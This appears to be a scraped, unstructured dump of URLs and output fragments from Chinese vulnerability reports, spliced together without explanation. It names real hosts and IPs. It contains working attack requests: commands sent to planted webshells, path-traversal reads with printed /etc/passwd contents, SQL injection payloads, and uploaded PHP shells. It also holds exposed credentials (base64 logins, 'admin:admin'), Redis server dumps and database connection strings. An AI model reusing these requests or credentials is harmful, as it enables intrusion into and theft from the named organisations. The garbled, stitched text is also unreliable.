http://wechat.datangmobile.cn/axis2/services/Cat/exec?cmd=systeminfo http://sjc.hubu.edu.cn/gzdt_detail.asp?id=367 http://sjc.hubu.edu.cn/gzdt_detail.asp http://psy.hubu.edu.cn/Admin/Login.aspx http://klsaofm.hubu.edu.cn/webmanage/web_manage.asp http://gs.hubu.edu.cn/more.aspx?xt=2004618433 http://gs.hubu.edu.cn/score/default.aspx http://www.koyimall.com/?act=shop.goods_view&GS=219967 http://**.**.**.**/ http://**.**.**.**/Machine/remote/?acid=361525 http://**.**.**.**/Machine/remote/?acid=361536 http://**.**.**.**/Machine/remote/?acid=361559 http://**.**.**.**/Machine/remote/?acid=361562 http://**.**.**.**/Machine/remote/?acid=361565 http://**.**.**.**/Machine/remote/?acid=361573 http://**.**.**.**:10038/severlogin.html#wwwuser/user=TWpFd016SXpNVEF3TURBd01EYz0=&wwwuser/password=WVRJeE1ETXlNekV3TURBd01EQTM= http://**.**.**.**:10000/severlogin.html#wwwuser/user=ZEdsaGJuUnBZVzVvWVc1NmFHVnVadz09&wwwuser/password=ZEdsaGJuUnBZVzVvWVc1NmFHVnVaelkyT0E9PQ== http://m.sjzhushou.com/cgi-bin/msgList?device=iPhone8%2C1&ios_ver=9.3.1&maxCount=10&partnerId=0x20800003&peerID=bc9b70763a1d003V&peer_id=bc9b70763a1d003V&productID=31&product_id=31×tamp=1460350872.750189&ver=5.13.1.2782&versionCode=51301 www.wjasset.com http://www.wjasset.com http://**.**.**.**/bugs/wooyun-2010-0192841,"基本上"是利用%23%0a进行bypass,没错,都修复了。 http://mailarchive.263.net/help.jsp http://mailarchive.263.net:8080/help.jsp http://www.chinazrbc.com/indexv.action http://qcar.**.**.**.**/reLogin.do http://**.**.**.**/portal/c http://m.sjzhushou.com/cgi-bin/msgList?device=iPhone7%2C2&ios_ver=9.3.1&maxCount=10&partnerId=0x20800003&peerID=e3efbe5003V&peer_id=e3efbe003V&productID=31&product_id=31×tamp=1454238001&ver=5.13.1.2782&versionCode=51301 http://test.geetest.com/存在phpmyadmin以及wordpress。加上兑换回来的插件扫了一遍,居然发现被扫出来了弱口令 http://**.**.**.**/ http://**.**.**.**/access_nodes/100000 http://**.**.**.**/access_nodes/172642 http://**.**.**.**/access_nodes/500 http://**.**.**.**/access_nodes/690 http://**.**.**.**/rest/developer/toDeveloperCert http://**.**.**.**//files//5147-20160412090203.jsp http://m.sjzhushou.com/cgi-bin/media_filter?code=all_movie&ver=51301&product_id=37&area=0×tamp=1460420940482&xlcache=2&tab=1*&year=0&versioncode=90220&op=2&page=1&pm=iphone http://m.sjzhushou.com/ios_page/iphone/channel/movie_v36.html?category=movie&code=all_movie&type=all_movie&area=0&year=0&isVip=0&peerID=1c661bf1c21d003V&peer_id=1c661bf1c21d003V&ver=5.13.1.2782&productID=31&ios_ver=7.1.1&versionCode=51301&product_id=31&partnerId=0x20800003&device=iPhone4,1&encode=1 share.kuwo.cn/album/h/xinQingViewtype=mb&subkey=3658&page=8&id=8 http://211.151.175.94/ http://115.29.169.166 http://42.62.30.18:8080/ http://42.62.30.18:8080/service/?typeId=1001*&pageChannel=4&_=1460430144351&time=-1 http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8 https://my.hfbank.com.cn:8091/cgi-bin/test-cgi https://game.egbank.com//cgi-bin/test-cgi http://s2.app1104922445.qqopenapp.com/ http://s2.app1104922445.qqopenapp.com:82/ http://my.qzone.qq.com/app/1104922445.html http://mobstat.fengjr.com/razor/index.php?/ums/postEvent http://mobstat.fengjr.com/razor/index.php?/ums/postEvent http://**.**.**.**/123.php http://s2.app1104922445.qqopenapp.com:82/System/ServerEdit/1 http://s2.app1104922445.qqopenapp.com:82/t.aspx http://tk2.ya247.com redis_version:2.6.16 redis_git_sha1:00000000 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.6 process_id:4043 run_id:0f89bdc9a6b581d090794c2958a66378f908ac7c tcp_port:7377 uptime_in_seconds:3870141 lru_clock:1341304 used_memory:2912472 used_memory_human:2.78M used_memory_rss:47570944 used_memory_peak:12092599096 http://s138.app24599.qqopenapp.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://s138.app24599.qqopenapp.com/ http://xia.qq.com/ http://s138.app24599.qqopenapp.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://km.oa.com/group/gslb/article_view/60750 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin www:x:50001:500::/data/www:/bin/bash http://api.ycpai.com/admin/ycpai_center/user_list/?menuid=60&page=10 http://www.ycpai.com/h5/partner/partner_list?login_code= http://www.sqtxj.com/language/Change.do?languageName=cn存在命令执行漏洞 http://www.xiaoshuxiong.com/?fm=7 http://www.xiaoshuxiong.com/?fm=7 http://**.**.**.**/bugs/wooyun-2015-0165284 http://183.230.4.37:8000/manager/html http://**.**.**.**/ http://**.**.**.**:8055/hmwap/main/index.action http://www.yinhoo.com/news.php?id=41 http://**.**.**.**bn.tv/ http://**.**.**.**bn.tv/channels/4.html http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p http://**.**.**.**/ http://cloud.vpclub.cn/ http://cloud.vpclub.cn/Common/RemoteUpload.ashx?action=managerfile&path=../ https://www.e-custody.com/login.jsp http://house.focus.cn/dmc/type_list.php?bathroom=0&bedroom=0&group_id=2572&page=2&price=&proj_id=1619&set_type=0&sittingroom=0&total_price= http://211.151.3.118/ksweb/login/go http://116.10.197.134:8080/#login http://wenduwx.7east.cn/xmlaction!ReduceCnt.do http://**.**.**/console/ jdbc:oracle:thin:@**.**.**.**:1521:yktdb http://ordosles.mychery.com/wcn/frame/.x http://111.207.167.212 http://**.**.**.**/spsp/login!logout.do http://share.vip.com/Acts/SetCount?id=63200 http://pc.ehuatai.com/upload/fckeditor/xsxs.aspx http://218.78.214.24:8080/live/service/top/hasNewOrgan?code=310112110&username=eshimin34188390 http://apps.eshimin.com/survey/invest/addDcResult http://115.182.70.182/login_login.action http://115.182.70.176:8080/login_login.action https://auth.p4p.sogou.com/login?service=${1000-900 https://auth.p4p.sogou.com/login?service=${pageContext http://game.2345.com/server/search/think.php?so=a http://drops.wooyun.org/tools/4760 http://ucenter.1312.com/data/tmp/upload1257554.jpg/.php IP:180.76.140.233 redis_version:2.8.4 redis_git_sha1:00000000 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 process_id:24318 run_id:8fe479471888bb4edc00af947ca7aea4e2541274 tcp_port:6379 uptime_in_seconds:6657827 lru_clock:1349883 used_memory:544768 used_memory_human:532.00K used_memory_rss:1638400 used_memory_peak:1237600 used_memory_peak_human:1.18M used_memory_lua:38912 mem_fragmentation_ratio:3.01 mem_allocator:jemalloc-3.4.1 rdb_changes_since_last_save:10478 rdb_last_save_time:1454398032 rdb_last_bgsave_status:err total_connections_received:2166 total_commands_processed:38777 keyspace_hits:12138 keyspace_misses:7057 latest_fork_usec:196 role:master repl_backlog_size:1048576 used_cpu_sys:1419.20 used_cpu_user:1636.42 used_cpu_sys_children:292.56 used_cpu_user_children:166.27 db0:keys=1,expires=0,avg_ttl=0 IP:182.61.9.225 redis_version:3.0.5 redis_git_sha1:00000000 redis_build_id:a46578aeaeed0f67 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:22404 run_id:3e7fda016038c7bc6fb37480fb4bcb4199f909f3 tcp_port:6379 uptime_in_seconds:1786283 lru_clock:916177 config_file:/etc/redis.conf used_memory:901120 used_memory_human:880.00K used_memory_rss:2678784 used_memory_peak:949112 used_memory_peak_human:926.87K used_memory_lua:36864 mem_fragmentation_ratio:2.97 mem_allocator:libc rdb_last_save_time:1460525179 total_connections_received:7213 total_commands_processed:7534 total_net_input_bytes:398687 total_net_output_bytes:126621 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 keyspace_hits:633 latest_fork_usec:215 role:master repl_backlog_size:1048576 used_cpu_sys:507.02 used_cpu_user:330.11 used_cpu_sys_children:0.09 used_cpu_user_children:0.00 db0:keys=4,expires=0,avg_ttl=0 IP:180.76.149.53 redis_version:3.0.6 redis_git_sha1:00000000 redis_build_id:5c7eaa2e19cb5102 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:1732 run_id:beb0c8ab0beb39c0e67978f94e8d52b5d6b80fc0 tcp_port:6379 uptime_in_seconds:6734471 lru_clock:916289 config_file:/home/wwwroot/www.shell.com/redis-3.0.6/redis.conf used_memory:917904 used_memory_human:896.39K used_memory_rss:2617344 used_memory_peak:949696 used_memory_peak_human:927.44K used_memory_lua:36864 mem_fragmentation_ratio:2.85 mem_allocator:libc rdb_last_save_time:1460470546 aof_current_size:70952 total_connections_received:910 total_commands_processed:1109 total_net_input_bytes:101816 total_net_output_bytes:214890 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 latest_fork_usec:384 role:master repl_backlog_size:1048576 used_cpu_sys:5805.96 used_cpu_user:2799.02 used_cpu_sys_children:0.14 used_cpu_user_children:0.05 db0:keys=1,expires=0,avg_ttl=0 ip:180.76.150.114 redis_version:2.8.19 redis_git_sha1:00000000 redis_build_id:edaf234646095212 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:25344 run_id:67e5ec4c3834b9726edffc0ee3fb92b8ebc7ca51 tcp_port:6379 uptime_in_seconds:14007210 uptime_in_days:162 lru_clock:916339 config_file:/etc/redis.conf used_memory:1878720 used_memory_human:1.79M used_memory_rss:7864320 used_memory_peak:7404136 used_memory_peak_human:7.06M used_memory_lua:35840 mem_fragmentation_ratio:4.19 mem_allocator:jemalloc-3.6.0 rdb_last_save_time:1460364014 total_connections_received:459173997 total_commands_processed:873581211 total_net_input_bytes:31283716245 total_net_output_bytes:567422830645 instantaneous_input_kbps:1.18 instantaneous_output_kbps:18.84 keyspace_hits:2112479520 latest_fork_usec:340 role:slave master_host:121.40.56.18 master_port:6379 slave_repl_offset:11671009 slave_priority:100 repl_backlog_size:1048576 used_cpu_sys:89698.45 used_cpu_user:38758.61 used_cpu_sys_children:2.06 used_cpu_user_children:0.68 db0:keys=440,expires=0,avg_ttl=0 ip:180.76.147.42 redis_version:2.5.14 redis_git_sha1:21645232 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.6.3 process_id:13481 run_id:52eb35d50863a823ec6fbccbc7faae2a3e5b8e61 tcp_port:6379 uptime_in_seconds:3129468 lru_clock:1349929 used_memory:564560 used_memory_human:551.33K used_memory_rss:2146304 used_memory_peak:645216 used_memory_peak_human:630.09K used_memory_lua:31744 mem_fragmentation_ratio:3.80 mem_allocator:jemalloc-3.0.0 rdb_last_save_time:1460534001 aof_current_size:27831065 total_connections_received:2146 total_commands_processed:342802 keyspace_hits:992383 keyspace_misses:194 latest_fork_usec:265 role:master used_cpu_sys:4661.32 used_cpu_user:2119.40 used_cpu_sys_children:1.70 used_cpu_user_children:0.11 db0:keys=6,expires=0 http://bsy.7cha.com/wsc下订单处地址栏可以插入xss代码,已打管理员cookeis,进入后台,各种数据泄露 http://www.51ruyidai.com/data/avatar/6317_avatar_middle.jpg/.php http://bbs.wan.58.com//config/config_ucenter.php.bak http://**.**.**.**/manager/html http://**.**.**.**/WiFiSDK/index.jsp?z0=utf-8 http://so.2345.com/2345app/get_app_news.php?nt=0&type=660&id= http://**.**.**/_ Bcast:192.168.255***** fefb:f***** http://125.76.246.246:8080/ztehby/user_loginUI.do http://**.**.**/_ http://**.**.**/script_ www.ejsh.com.c***** www.ejsh.com.c***** http://esmdownload1.yulong.com/ftp.login.htm http://esmdownload1.yulong.com/666.jsp?pwd=023&i=ipconfig ffff:ffff:fffd%4 c058:6301::c058:6301 http://esmdownload1.yulong.com/666.jsp?pwd=023&i=net%20user http://**.**.**.**/ http://**.**.**.**/MyAccount/MyOrderDetail.aspx?soSysNo=28385 http://**.**.**.**/bugs/wooyun-2015-0157676 http://**.**.**.**/bugs/wooyun-2010-0148933 ruins:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# http://**.**.**.** http://www.eaonline.com.cn/chargezone/chargeContent.dll?id=1000 http://www.eaonline.com.cn/chargezone/chargeList.dll?kind=b http://www.eaonline.com.cn/info/serviceContent.dll?id=82818 http://www.eaonline.com.cn/cpzs/cpzs.php?id=1369 http://www.eaonline.com.cn/info/infoContent.dll?id=123540 http://www.eaonline.com.cn/info/infoListnews.dll?id=10 http://funxoo.com/mapsearch.php?contentid=146028 http://funxoo.com/mapsearch.php?ditie=1&price=&diqu=10&housetype=1 http://funxoo.com/houselist.php?p=&bankuai=1&catid=69 http://www.funxoo.com/eshouselist.php?rentype=0&price=1&diqu=0&catid=78 http://www.funxoo.com/houselist_wj.php?catid=218&ditie=0&price=0&diqu=76 http://www.funxoo.com/czhouselist.php?rentype=2&diqu=0&catid=83 http://bbs.funxoo.com/uc_server index.php/web/web/addShoulu http://sums.suning.com/announce/download.htm?classification1=/home/backend/.ssh/authorized_keys&name= http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/hrm/resource/HrmResourceBasicInfo.jsp?id=25 http://cos.sto.cn/hrm/resource/HrmResourceBasicInfo.jsp?id=25 http://cos.sto.cn/hrm/resource/HrmResourceBasicInfo.jsp?id=25 http://xgt2015.dragonpass.com.cn:58124 https://bp.dragonpass.com.cn/about/addCustomerShare http://**.**.**.**:8081/certificate/index.do http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml http://f.youdao.com/file.do?method=getMajorName&subject=undefined* http://sqlmap.org http://api.v.2345.com/html/mversion/checkIsEnable.php?id=159817*&media=dy&device=android&callback=jsonp12 http://sqlmap.org http://101.227.68.57:8080 http://101.227.68.57:8080/plugins/weathermap/configs/test.php http://101.227.68.57:8080/plugins/weathermap/configs/wooy1n.php http://vip.iqiyi.com/order.html?mainland=1&serviceCode=lyksc7aq36aedndk&pid=a0226bd958843452&fc=a988b1d4503873af http://account.iqiyi.com/package/package.action http://www.haikele.com/yssfclist.aspx?Type=A http://www.haikele.com/yssfclist.aspx?Taste=A http://www.haikele.com/sfcwzlb.aspx?CategoryID=U www.haikele.com http://www.haikele.com https://**.**.**.**/franksheng/tal/blob/5cad746ab8e8cc29cb15c8579db1dd733b2d9c2e/tal-server/src/main/java/upsmart/tal/server/mail/MailTest.java http://123.206.58.124/user_login.php https://mail.midea.com/ https://mail.midea.com/coremail/common/preview/preview.jsp?mid=2%3a1tbiAgQFLVYilUwPWAAAmU&mboxa=&part=5 http://211.100.37.7/ http://211.100.37.7/.svn/entries http://211.100.37.34/login.do http://211.100.37.7/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://carprice.58.com jdbc:oracle:thin:@ http://115.182.51.77:8080/live-ms3/login http://58.248.41.164/jenkins/ http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/services/MobileService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="webservices.services.weaver.com.cn xmlns:urn2="http://workflow.webservices.mobile.weaver SOAP-ENV:Header/ SOAP-ENV:Body urn:checkUserLogin urn:in0 urn:in0 urn:in1 urn:in1 urn:in2 urn:in2 urn:checkUserLogin SOAP-ENV:Body SOAP-ENV:Envelope http://apps.d.ifeng.com/index.php/voting/index/answer/tid/199 http://cidadev01.chinacloudapp.cn/cida_platform/ url:http://cms.dichan.com/default.aspx http://**.**.**.**/bugs/wooyun-2010-0119996 http://**.**.**.**/bugs/wooyun-2015-0119873 http://**.**.**.**/bugs/wooyun-2015-0119996 http://**.**.**.**/bugs/wooyun-2016-0196048 http://**.**.**.**/bugs/wooyun-2015-0120530/ jdbc:oracle:thin:@**.**.**.**:1521:ORCL jdbc:oracle:thin:@**.**.**.**:1521:ORCL encap:Ethernet c6:38:99 addr:218.30.113.65 Bcast:218.30.113.127 Mask:255.255.255.192 fec6:3899/64 Scope:Link MTU:1500 packets:3979542 packets:97531 txqueuelen:1000 http://lpsqs01.cpicbj.com:8080/CPICPrint/platform/login.do http://gouwu.duba.com www.balans.com.cn/news-details.php?id=28 https://mlife.cmbchina.com/PlutoPushProxy/queryMessageFromClientV5.json https://mlife.cmbchina.com/PlutoPushProxy/queryMessageFromClientV5.json https://uc.qycn.com/login.php https://uc.qycn.com/announcement.php?an_status=1&act=search&an_publish_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%8F%91%E5%B8%83%E6%97%A5%E6%9C%9F&an_end_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%BB%93%E6%9D%9F%E6%97%A5%E6%9C%9F&keyword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&type=list&submit=%E6%90%9C+%E7%B4%A2 http://mt.emaotai.cn:9188/System/Admin/Login admin:admin http://qr.emaotai.cn:8002/Login.aspx http://item.m.jd.com/product/11219511.html http://item.m.jd.com/product/2493112.html http://**.**.**.**/download/listdown.asp?id=7156 http://m.sfn.cn/pcview.html?url=http://m.sfn.cn/mobile/member/login.aspx https://219.141.191.165/IMRINFO/AT/ZIMComm https://95566.boc.cn/IMRINFO/AT/ZIMComm https://95566.boc.cn/ZIM/IMRINFO/AT/ZIMComm http://202.98.222.93:5000/rlzy/LoginTo.aspx http://open.lmbang.com/find-result/index?mvc=1&kw=1 http://wap.emaotai.cn:9000 http://wap.emaotai.cn:9000/eAPI/API/safe/GetAllPersonOptions?firstlabel=--%E8%AF%B7%E9%80%89%E6%8B%A9%E7%94%A8%E6%88%B7--&firstvalue=&Deptbm=008000000001069&loginid=&usercode= http://**.**.**.**/ index.php/Admin/Index/login http://**.**.**.**:8080/Admin/HomePage/index index.php/Admin/Index/login http://**.**.**.**/index.php/Admin/Main/login http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/WEb.xml URL:http://219.135.189.180:8090/jmx-console/ http://219.135.189.180:8090/jmx-console/ http://219.135.189.180:8090/EngineWeb/ http://219.135.189.180:8090/admin-console/ http://219.135.189.180:8090/bpel-console http://219.135.189.180:8090/gpd-deployer/ http://219.135.189.180:8090/juddiv3/ http://219.135.189.180:8090/web-console http://219.135.189.180:8090/noo/index.jsp http://10.10.2.9:8080 http://10.10.2.27:80 http://10.10.2.9:80 http://10.10.2.22:8080 http://10.10.2.14:8081 http://10.10.2.21:8080 http://10.10.2.14:80 http://10.10.2.29:8081 http://10.10.2.15:80 http://10.10.2.17:80 http://10.10.2.24:80 http://10.10.2.25:80 http://10.10.2.100:8080 http://**.**.**.**/bugs/wooyun-2016-0169453 http://**.**.**.**/phpmyadmin/ http://**.**.**.**/Admin/Index1/login http://**.**.**.**/Uploads/f.php http://**.**.**.**/Uploads/f.php http://**.**.**.**/op/advice.do?method=adviceInfo&ctrl=mod http://**.**.**.**/op/pages/login.jsp http://git.corp.ppweb.com.cn/public http://rscdn.vjia.com/css.ashx?href=web.config http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Connection.config http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Parameters.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/WebSite.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/RSConfig.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SearchConfig.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SolrCoreConfig.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/CacheConfig.config http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SortConfig.xml http://mall.lmbang.com/api-comment/list?client=web&client=web&os=h5&client_flag=lmbang&id=29587&p=1&ps=1 http://mall.lmbang.com/api-comment/list?client=web&client=web&os=h5&client_flag=lmbang&id=29587&p=1&ps=1%20procedure%20analyse%28extractvalue%281,benchmark%2810000000,md5%28111%29%29%29,1%29%20--%20- https://jikexueyuan.zentaopm.com/ http://work.eoemobile.com http://**.**.**.**/user/info.html http://**.**.**.**/user/index.html http://**.**.**.**/user/info.html http://**.**.**.**/user/info.html http://**.**.**.**/index.php http://**.**.**.**/index.php http://**.**.**.**/index.php/admin/index/login http://**.**.**.**/index.php http://game.weibo.com/home/giftcenter/allgift?id=1793466158 http://game.weibo.com/home/giftcenter/allgift?id=1793466158 http://www.wswifi.cn/news_text.asp?newsid=3 http://ws.wswifi.cn/news_text.asp?newsid=25 jdbc:oracle:thin:@**.**.**.**:1521:jnwsfwdb1 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=1 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=333 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=666666 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=678289 http://e.dangdang.com/media/api2.go?deviceSerialNo=8D47C214-7A36-465C-B722-F6D35E578467&clientOs=iPhone%2520OS7.1.1&columnType=all_aa*&platform=2&deviceType=iphone&isFull=1&channelId=10020&clientVersionNo=5.5.0&returnType=json&end=20&serverVersionNo=1.0&token=0d50506475bcaea555e6c0d9e933115e&macAddr=020000000000&orderSource=30000&fromPlatform=101&action=column&platformSource=DDDS-P&permanentId=20160416115048424116807875249950073&resolution=640x960&start=0 https://220.181.1.131/ https://**.**.**.** http://comm.dangdang.com/parents/index.php?mode=ajax&sort_type=creation_date&ajax_type=img_list&pageindex=1&_=1460665788473 https://appi.fengjr.com/app/api/v1/home/ios?v=1.5 http://**.**.**/sdp/zfjxywk/guide.domethod=busEntry&configIIDD=C13AEF7B6A0E40DF80ACFD2A4A4D55E5%27%20and%201%3d2%20and%20%27a%27%3d%27a_ http://www.himofi.com/ http://m.himofi.com/v3/cp/users/login http://m.himofi.com/v3/cp/upload/merchant/2016/04/16/57120841d30f0.php https://mail.ahic.com.cn http://221.123.132.16/ jdbc:oracle:thin:@**.**.**.**:1521:portal1 http://122.227.248.254:8080/applications/qsweb/login.jsp encap:Ethernet AA:05:0D addr:172.17.167.8 Bcast:172.17.167.255 Mask:255.255.255.0 feaa:50d/64 Scope:Link MTU:1500 packets:109947766 packets:56767625 txqueuelen:1000 http://**.**.**.**/bugs/wooyun-2016-0196866 http://**.**.**.** http://**.**.**.**/buylist.php http://**.**.**.**/buylist.php http://**.**.**.**/package.php?action=add http://**.**.**.** http://**.**.**.**/index.php/admin/count/visitors http://**.**.**.**/index.php/admin/count/onlinepla http://**.**.**.**/login.php http://**.**.**.**/index.php http://**.**.**.**/admin/index/index http://**.**.**.**/index.php http://**.**.**.**/ https://**.**.**.**/myoneray/Test/blob/3923948a2778791571390631cc242530c21ddc23/data-center/src/main/resources/jdbc.properties https://**.**.**.**/tianqf/tianqf.**.**.**.**/blob/5f2fc108da31837fbadc7cc047c2d14a8ad70c80/_posts/2015-11-14-install-and-setup-redmine.html http://**.**.**.**/bugs/wooyun-2016-0196266 http://180.149.134.22/stats/2013_10_14_access_log http://live800.wan.renren.com http://**.**.**.**/wjmm/index.html http://**.**.**.**/validtmp/validtmp_changPassword.do?param._se_securityCode=668EB0FFD7A8BB548B846B65D40DC594 http://online.yeepay.com http://**.**.**.**/ http://**.**.**.**/ http://m.dangbei.com/wap-view-728.html http://219.143.219.77:8001,http://219.143.219.74:8001 http://shop.znds.com/ http://203.187.184.7/mty/logon.jsp http://203.187.184.7/mty/logon.jsp http://mashifu.astro.ifeng.com/ https://mail.midea.com https://vpn.midea.com/ https://sp.midea.com/ https://oa.kysec.cn/login/Login.jsp?logintype=1 https://oa.kysec.cn/services/MobileService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="webservices.services.weaver.com.cn xmlns:urn2="http://workflow.webservices.mobile.weaver SOAP-ENV:Header/ SOAP-ENV:Body urn:checkUserLogin urn:in0 urn:in0 urn:in1 urn:in1 urn:in2 urn:in2 urn:checkUserLogin SOAP-ENV:Body SOAP-ENV:Envelope http://www.4008118228.cn/ http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=ls http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=/sbin/ifconfig http://www.cninsure.net ftp://219.141.188.8 ftp://219.141.188.8/data/ https://www.bohaitrust.com/ https://www.bohaitrust.com/Journal/favors/cid/4?newid=107 http://**.**.**/gzxmbj/XMBJ/Index.aspx jdbc:oracle:thin:@**.**.**.**:1521:js12366ww http://103.248.102.13/ http://user.iyiyun.com http://user.iyiyun.com/Login/Index/checkUserNameAjax?userName=admin http://himall.hisense.com/assets/common/uploadify/ http://218.58.78.151/new_theme/common/uploadify/ http://218.58.78.151/new_theme/common/uploadify/uploadify.php http://www.yrib.com/ http://www.yrib.com/richsafe_getNewsDetailById.action?id=10 https://**.**.**.**/davidhaha6/GradleTestA/blob/9226c5dfc335b74803c7468c22dc624b10cf3329/modules/m1/src/main/resources/application.conf http://**.**.**.** https://openapi.youku.com/v2/oauth2/authorize?client_id=a99157586955e228&response_type=code&redirect_uri=http://shop.youku.com/i/login/youku/callback&state= http://122.112.12.135//utility/convert/index.php redis://122.112.12.155:6400 redis://122.112.12.155:6401 redis://122.112.12.155:6402 redis://122.112.12.155:6405 redis://122.112.12.155:6403 redis://122.112.12.155:6404 http://drops.wooyun.org/papers/10546 http://www.oschina.net/news/67975/redis-defect?from=mail-notify https://124.127.98.179 https://124.127.98.173 https://124.127.98.155 https://124.127.98.158 https://vpn.sinopharm.com/ http://mdm.sinopharm.com http://mdm.sinopharm.com//uapws/service/nc.itf.ses.inittool.PortalSESInitToolService http://oamob.cninsure.net/common/cvar/CExec.jsp http://www.zxcn.com:8001/Default.aspx http://219.141.188.35/biportal http://lzguat.cninsure.net:9090/ http://202.108.145.241/phpMyAdmin/ http://m.api.lianjia.com http://m.api.lianjia.com/web/ershoufang/sidebar?callback=jQuery1111010487171867862344_1460815277788&cityId=320100&id=320100&uuid=62bf4246-294e-457f-9790-8bc572c0886f&ucid=&type=city&_=1460815277789 https://10.210.x.x/login.html http://**.**.**.**/ http://android.myapp.com/myapp/detail.htm?apkName=com.condenast.gq24 http://103.37.152.57/ http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=51&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&cellid=gsm_460_00_9763_3922&sc=0 http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=51&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5%27XOR%28if%28now%28%29=sysdate%28%29,sleep%283%29,0%29%29OR%27&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&cellid=gsm_460_00_9763_3922&sc=0 http://wx.ah.huatu.com/ http://wx.ah.huatu.com/Uploads/Picture/2016-04-18/5714a7c9330a4.php http://**.**.**.**/bugs/wooyun-2010-0178322为例: soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/ xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService soapenv:Header/ soapenv:Body icur:exportCurrtypeToCrm http://**.**.**.**/login.jsp http://**.**.**.**/live800/ http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1 http://**.**.**.**/live800/ http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1 http://**.**.**.**/live800/ http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1 http://**.**.**.**/live800/ http://**.**.**.**/live800/ http://**.**.**.**/live/ 